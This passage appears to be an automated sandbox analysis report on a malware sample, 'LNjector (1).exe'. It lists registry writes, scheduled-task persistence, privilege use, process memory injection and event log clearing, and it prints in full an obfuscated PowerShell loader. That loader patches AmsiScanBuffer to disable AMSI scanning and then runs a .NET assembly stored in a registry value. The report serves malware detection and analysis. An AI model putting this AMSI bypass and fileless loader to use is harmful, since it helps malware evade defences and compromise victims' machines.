Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" LNjector (1).exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80d43aad2469a5304598e1ab02f9417aa80000 LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3296 schtasks.exe 4732 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3452 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3664 powershell.exe 3664 powershell.exe 4188 powershell.exe 4188 powershell.exe 456 powershell.exe 456 powershell.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 4604 powershell.EXE 4604 powershell.EXE 4604 powershell.EXE 1220 LNjector (1).exe 1220 LNjector (1).exe 4604 powershell.EXE 864 dllhost.exe 864 dllhost.exe 864 dllhost.exe 864 dllhost.exe 864 dllhost.exe 864 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1220 LNjector (1).exe 3452 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3664 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe Token: SeDebugPrivilege 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe Token: SeDebugPrivilege 3684 $77non.exe Token: SeDebugPrivilege 3684 $77non.exe Token: SeDebugPrivilege 4008 $77oui.exe Token: SeDebugPrivilege 4008 $77oui.exe Token: SeDebugPrivilege 4604 powershell.EXE Token: SeDebugPrivilege 1220 LNjector (1).exe Token: SeDebugPrivilege 4604 powershell.EXE Token: SeDebugPrivilege 864 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2280 svchost.exe Token: SeIncreaseQuotaPrivilege 2280 svchost.exe Token: SeSecurityPrivilege 2280 svchost.exe Token: SeTakeOwnershipPrivilege 2280 svchost.exe Token: SeLoadDriverPrivilege 2280 svchost.exe Token: SeSystemtimePrivilege 2280 svchost.exe Token: SeBackupPrivilege 2280 svchost.exe Token: SeRestorePrivilege 2280 svchost.exe Token: SeShutdownPrivilege 2280 svchost.exe Token: SeSystemEnvironmentPrivilege 2280 svchost.exe Token: SeUndockPrivilege 2280 svchost.exe Token: SeManageVolumePrivilege 2280 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2280 svchost.exe Token: SeIncreaseQuotaPrivilege 2280 svchost.exe Token: SeSecurityPrivilege 2280 svchost.exe Token: SeTakeOwnershipPrivilege 2280 svchost.exe Token: SeLoadDriverPrivilege 2280 svchost.exe Token: SeSystemtimePrivilege 2280 svchost.exe Token: SeBackupPrivilege 2280 svchost.exe Token: SeRestorePrivilege 2280 svchost.exe Token: SeShutdownPrivilege 2280 svchost.exe Token: SeSystemEnvironmentPrivilege 2280 svchost.exe Token: SeUndockPrivilege 2280 svchost.exe Token: SeManageVolumePrivilege 2280 svchost.exe Token: SeAuditPrivilege 2568 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2280 svchost.exe Token: SeIncreaseQuotaPrivilege 2280 svchost.exe Token: SeSecurityPrivilege 2280 svchost.exe Token: SeTakeOwnershipPrivilege 2280 svchost.exe Token: SeLoadDriverPrivilege 2280 svchost.exe Token: SeSystemtimePrivilege 2280 svchost.exe Token: SeBackupPrivilege 2280 svchost.exe Token: SeRestorePrivilege 2280 svchost.exe Token: SeShutdownPrivilege 2280 svchost.exe Token: SeSystemEnvironmentPrivilege 2280 svchost.exe Token: SeUndockPrivilege 2280 svchost.exe Token: SeManageVolumePrivilege 2280 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2280 svchost.exe Token: SeIncreaseQuotaPrivilege 2280 svchost.exe Token: SeSecurityPrivilege 2280 svchost.exe Token: SeTakeOwnershipPrivilege 2280 svchost.exe Token: SeLoadDriverPrivilege 2280 svchost.exe Token: SeSystemtimePrivilege 2280 svchost.exe Token: SeBackupPrivilege 2280 svchost.exe Token: SeRestorePrivilege 2280 svchost.exe Token: SeShutdownPrivilege 2280 svchost.exe Token: SeSystemEnvironmentPrivilege 2280 svchost.exe Token: SeUndockPrivilege 2280 svchost.exe Token: SeManageVolumePrivilege 2280 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2280 svchost.exe Token: SeIncreaseQuotaPrivilege 2280 svchost.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
pid Process 1220 LNjector (1).exe 1220 LNjector (1).exe 1220 LNjector (1).exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE -
Suspicious use of SendNotifyMessage 30 IoCs
pid Process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1220 LNjector (1).exe 3452 Explorer.EXE 3452 Explorer.EXE 1220 LNjector (1).exe 1220 LNjector (1).exe 3452 Explorer.EXE 3452 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 4216 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1220 wrote to memory of 3664 1220 LNjector (1).exe 85 PID 1220 wrote to memory of 3664 1220 LNjector (1).exe 85 PID 1220 wrote to memory of 4188 1220 LNjector (1).exe 87 PID 1220 wrote to memory of 4188 1220 LNjector (1).exe 87 PID 1220 wrote to memory of 456 1220 LNjector (1).exe 89 PID 1220 wrote to memory of 456 1220 LNjector (1).exe 89 PID 1220 wrote to memory of 2180 1220 LNjector (1).exe 100 PID 1220 wrote to memory of 2180 1220 LNjector (1).exe 100 PID 1220 wrote to memory of 2180 1220 LNjector (1).exe 100 PID 1220 wrote to memory of 1664 1220 LNjector (1).exe 101 PID 1220 wrote to memory of 1664 1220 LNjector (1).exe 101 PID 1220 wrote to memory of 1664 1220 LNjector (1).exe 101 PID 2180 wrote to memory of 4564 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 107 PID 2180 wrote to memory of 4564 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 107 PID 2180 wrote to memory of 4564 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 107 PID 1664 wrote to memory of 4336 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 106 PID 1664 wrote to memory of 4336 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 106 PID 1664 wrote to memory of 4336 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 106 PID 1664 wrote to memory of 748 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 110 PID 1664 wrote to memory of 748 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 110 PID 1664 wrote to memory of 748 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 110 PID 2180 wrote to memory of 1984 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 111 PID 2180 wrote to memory of 1984 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 111 PID 2180 wrote to memory of 1984 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 111 PID 748 wrote to memory of 3688 748 cmd.exe 114 PID 748 wrote to memory of 3688 748 cmd.exe 114 PID 748 wrote to memory of 3688 748 cmd.exe 114 PID 1984 wrote to memory of 5108 1984 cmd.exe 115 PID 1984 wrote to memory of 5108 1984 cmd.exe 115 PID 1984 wrote to memory of 5108 1984 cmd.exe 115 PID 4336 wrote to memory of 4732 4336 cmd.exe 116 PID 4336 wrote to memory of 4732 4336 cmd.exe 116 PID 4336 wrote to memory of 4732 4336 cmd.exe 116 PID 4564 wrote to memory of 3296 4564 cmd.exe 117 PID 4564 wrote to memory of 3296 4564 cmd.exe 117 PID 4564 wrote to memory of 3296 4564 cmd.exe 117 PID 748 wrote to memory of 3684 748 cmd.exe 119 PID 748 wrote to memory of 3684 748 cmd.exe 119 PID 748 wrote to memory of 3684 748 cmd.exe 119 PID 1984 wrote to memory of 4008 1984 cmd.exe 120 PID 1984 wrote to memory of 4008 1984 cmd.exe 120 PID 1984 wrote to memory of 4008 1984 cmd.exe 120 PID 1220 wrote to memory of 3568 1220 LNjector (1).exe 122 PID 1220 wrote to memory of 3568 1220 LNjector (1).exe 122 PID 1220 wrote to memory of 3568 1220 LNjector (1).exe 122 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 4604 wrote to memory of 864 4604 powershell.EXE 125 PID 864 wrote to memory of 616 864 dllhost.exe 5 PID 864 wrote to memory of 668 864 dllhost.exe 7 PID 864 wrote to memory of 956 864 dllhost.exe 12 PID 864 wrote to memory of 332 864 dllhost.exe 13 PID 864 wrote to memory of 512 864 dllhost.exe 14 PID 864 wrote to memory of 1032 864 dllhost.exe 15 PID 864 wrote to memory of 1052 864 dllhost.exe 17 PID 864 wrote to memory of 1064 864 dllhost.exe 18 PID 864 wrote to memory of 1188 864 dllhost.exe 19 PID 864 wrote to memory of 1196 864 dllhost.exe 20 PID 864 wrote to memory of 1272 864 dllhost.exe 21
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:332
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{862db49a-8de5-443a-b369-0d7c4898acb2}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1196 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ScOnkZoxSpfQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$btoJuPlbEfpCGf,[Parameter(Position=1)][Type]$FFtcNRGNWO)$TMZlDHPZIXs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+''+[Char](109)+'o'+'r'+''+[Char](121)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'s'+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+'a'+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+','+'A'+''+'u'+''+'t'+''+[Char](111)+''+'C'+'las'+[Char](115)+'',[MulticastDelegate]);$TMZlDHPZIXs.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+[Char](108)+'Na'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$btoJuPlbEfpCGf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$TMZlDHPZIXs.DefineMethod('I'+'n'+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+','+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',Vi'+'r'+'tual',$FFtcNRGNWO,$btoJuPlbEfpCGf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $TMZlDHPZIXs.CreateType();}$eoPKOwALHIYvK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'sof'+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+'s'+'a'+'fe'+[Char](78)+'a'+[Char](116)+''+'i'+'v'+[Char](101)+'M'+[Char](101)+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$OqLrSpFGItSOfB=$eoPKOwALHIYvK.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+','+'S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dUUrsGSCntdLXFaqmlO=ScOnkZoxSpfQ @([String])([IntPtr]);$FyIzlzpBVBUtVySSPVSwup=ScOnkZoxSpfQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cgQrHFLhFBu=$eoPKOwALHIYvK.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$uhSxwQNHFuVlyK=$OqLrSpFGItSOfB.Invoke($Null,@([Object]$cgQrHFLhFBu,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+'L'+'ib'+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$YdqGbsFgCAqSSdZBE=$OqLrSpFGItSOfB.Invoke($Null,@([Object]$cgQrHFLhFBu,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$kLjEiEc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uhSxwQNHFuVlyK,$dUUrsGSCntdLXFaqmlO).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+'l');$vDNLCxTGFXLfdVrlZ=$OqLrSpFGItSOfB.Invoke($Null,@([Object]$kLjEiEc,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'Sc'+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$CaUREfzhqS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdqGbsFgCAqSSdZBE,$FyIzlzpBVBUtVySSPVSwup).Invoke($vDNLCxTGFXLfdVrlZ,[uint32]8,4,[ref]$CaUREfzhqS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vDNLCxTGFXLfdVrlZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdqGbsFgCAqSSdZBE,$FyIzlzpBVBUtVySSPVSwup).Invoke($vDNLCxTGFXLfdVrlZ,[uint32]8,0x20,[ref]$CaUREfzhqS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
